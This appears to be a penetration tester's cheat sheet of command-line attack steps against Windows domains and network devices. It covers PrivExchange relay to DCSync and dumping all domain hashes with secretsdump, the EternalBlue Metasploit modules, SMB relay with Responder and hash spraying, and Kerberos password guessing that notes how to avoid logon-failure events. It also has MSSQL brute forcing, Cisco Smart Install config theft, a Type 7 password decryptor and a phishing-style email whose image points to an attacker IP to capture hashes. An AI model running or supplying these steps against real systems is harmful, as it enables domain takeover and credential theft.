PrivExchange article: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/.
With a regular domain user account, which has a mailbox within an on-premise Exchange server, can have their permissions escalated to receive privileges to perform a DCSync attack, which allows domain replication, by relaying Exchange authentication to an arbitrary URL through HTTP. As the Exchange server commonly has the ‘WriteDacl’ permission set, the relayed authentication allows for the modification of a specified account to grant them privileges to perform domain replication operations through DCSync. This is the Replicating Changes All and Replicating Directory Changes permissions, allowing for the compromise of the domain from a domain user account.
-
Clone the GitHub repo: https://github.com/dirkjanm/PrivExchange.git
-
Run ntlmrelayx:
ntlmrelayx.py -t ldap://[domaincontroller.domain.com] --escalate-user [username] -
Run PrivExchange:
python privexchange.py -ah [attacker IP] -u [username] -d [domain] [mailserver.domain.com] -
Run secretsdump to get all the hashes:
secretsdump.py [DOMAIN]/[username]@[dc.domain.com] -just-dc | tee [/path/to/output file] -
Cleanup: Grep the ntds dump you got from secretsdump for the NTLM hash for the exchange server that you exploited. Also locate the ACL restore file that ntlmrelayx leaves in the same directory. Install aclpwn:
pip install aclpwn. Run it:aclpwn --restore [/path/to/.restore file]
Grep host IP addresses with 445/tcp open and save to a file, 445.txt.
Run RunFinger.py in the Responder repository (make sure you use the script utility or tee to save the output):
while read -r line;do ./RunFinger.py -i $line -g;done <445.txt
Grep the RunFinger.py output for 'MS17-010: True'.
-OR-
Metasploit:
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/admin/smb/ms17_010_command
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue_win8
use exploit/windows/smb/ms17_010_psexec
Also see https://github.com/worawit/MS17-010
Run crackmapexec with the --gen-relay-list option to generate a file containing hosts that don't require SMB Signing.
Run Impacket ntlmrelayx with the -tf option specifying the file from the previous step.
./ntlmrelayx [-t [target IP] | -tf [targetsfile] (from --gen-relay-list)] -l [LOOTDIR] -of [outputfile]
Rerun Responder:
./Responder.py -I <interface> -wrd
Monitor ntlmrelayx output for any hashes that get dumped. If you get some, use crackmapexec to spray hashes across the network to discover systems that reuse the same local administrator account credentials.
No admin - SOL?
Modifications to ntlmrelayx
• Ropnop modified ntlmrelayx to not “waste” unprivileged SMB connections • Added two new options
• '--enum-local-admins'
• If the command execution fails, query local SAM for who has the right privileges
• --rid-cycle
• If the command execution fails, perform a RID cycle attack using LSAT to enumerate domain objects and save the result to a CSV • Ropnop's branch here:
• https://github.com/ropnop/impacket/tree/feature/enum_unprivdn
Password Guessing with Kerberos (From Ropnop, https://github.com/ropnop/kerberos_windows_scripts)
-
kinit_horizontal_brute.sh : Much less noise than SMB spraying and blue team is less likely to see failed attempts in the logs because Kerberos pre-authentication doesn't trigger a Logon Failure event (4625). It does trigger event 4771, "Kerberos pre-authentication failed" which is less likely to be logged than 4625.
-
Note from Ropnop's slides: Putting an IP address for the DC saves DNS lookups and makes this work faster.
medusa -H scans/mssql-hosts.txt -u sa -P ./default-mssql-passwords.txt -M mssql |tee /root/logs/mssql-passwords.log
Blank password:
medusa -H scans/mssql-hosts.txt -u sa -e ns -M mssql |tee /root/logs/mssql-passwords.log
Everything that you need to know: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
Use SIET or Metasploit module to test for smart-install or download vulnerable device configurations. Once you've downloaded device configurations, look for plaintext passwords, type 7 passwords which are easily cracked, and SNMP community strings. Try to use found credentials to login to the devices and use creds to password spray telnet and ssh. On some devices you may be able to run perform a packet capture to sift for credentials.
https://github.com/Sab0tag3d/SIET
Test:
python siet.py -l <file with IP's> -t
Download configs:
python siet.py -l <file with IP's> -g
Crack Type 7 hashes type7.py (@averagesecguy) :
import sys
V = [0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e,
0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44,
0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39,
0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76, 0x39, 0x38, 0x37, 0x33,
0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66, 0x67, 0x38, 0x37]
if len(sys.argv) != 2:
print("Usage: type7.py hash")
sys.exit(0)
hash = sys.argv[1]
i = int(hash[:2], 16)
r = ""
for j in range(2, len(hash) - 2, 2):
h = int(hash[j:j+2], 16)
r = r + chr(h ^ V[i])
i = (i + 1) % 53
print rExecute commands:
println "cmd /c whoami".execute().text
An exploit for Apache Struts CVE-2017-5638: https://github.com/mazen160/struts-pwn
First, configure your system to capture hashes (Responder) or relay (Impacket ntlmrelayx.py). Put recipient email addresses in file emailaddresses.txt.
Content of msg-body.txt:
<p>Hello,</p>
<p>[Insert name/company here] is testing for an open SMTP relay. Please forward this to me once you receive it.</p>
<p>Regards,</p>
<p>[Name]</p>
<p>Security Consultant, Penetration Testing</p>
<p>[Company]</p>
<p>[phone]</p>
<p>[email address]</p>
<p><img src="file://[Attacker IP address]/pic.jpg" alt="Download Images" /></p>
Bash shell:
while read -r line;do sendemail -f [from address] -t $line -u "Open SMTP relay test" -o message-file=msg-body.txt message-content-type=html -s [IP address]:25;done <emailaddresses.txt